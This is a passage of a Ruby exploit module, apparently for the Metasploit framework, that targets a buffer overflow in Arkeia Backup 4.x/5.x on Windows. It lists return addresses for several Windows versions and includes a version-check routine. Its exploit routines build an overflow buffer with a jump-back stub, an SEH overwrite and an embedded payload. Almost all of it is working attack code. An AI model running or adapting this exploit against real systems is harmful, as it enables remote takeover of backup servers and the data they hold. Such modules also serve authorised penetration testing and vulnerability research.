|
||||
['Arkeia 5.x Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 5 ] }], # ws2help.dll
|
||||
['Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 5 ] }], # ws2help.dll
|
||||
['Arkeia 4.2 Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 4 ] }], # ws2help.dll
|
||||
['Arkeia 4.2 Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 4 ] }], # ws2help.dll
|
||||
['Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 4 ] }], # ws2help.dll
|
||||
['Arkeia 4.2 Windows 2000 German', { 'Platform' => 'win', 'Rets' => [ 0x74fa1887, 4 ] }], # ws2help.dll
|
||||
],
|
||||
'DisclosureDate' => 'Feb 18 2005',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def check
|
||||
info = arkeia_info()
|
||||
if(not (info and info['Version']))
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
print_status("Arkeia Server Information:")
|
||||
info.each_pair { |k,v|
|
||||
print_status(" #{k + (" " * (30-k.length))} = #{v}")
|
||||
}
|
||||
|
||||
if (info['System'] !~ /Windows/)
|
||||
print_status("This module only supports Windows targets")
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
|
||||
data = (target['Rets'][1] == 5) ? prep_ark5() : prep_ark4()
|
||||
head[6, 2] = [data.length].pack('n')
|
||||
|
||||
begin
|
||||
sock.put(head)
|
||||
sock.put(data)
|
||||
sock.get_once
|
||||
rescue IOError, EOFError => e
|
||||
print_status("Exception: #{e.class}:#{e.to_s}")
|
||||
end
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
def prep_ark5
|
||||
data = Rex::Text.rand_text_english(4096, payload_badchars)
|
||||
data[1176, 4] = [target['Rets'][0]].pack('V')
|
||||
data[1172, 2] = "\xeb\xf9"
|
||||
data[1167, 5] = "\xe98" + [-1172].pack('V')
|
||||
data[0, payload.encoded.length] = payload.encoded
|
||||
end
|
||||
|
||||
def prep_ark4
|
||||
data = Rex::Text.rand_text_english(4096, payload_badchars)
|
||||
seh = generate_seh_payload( target['Rets'][0] )
|
||||
data[ 96, seh.length] = seh
|
||||
end
|
||||
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue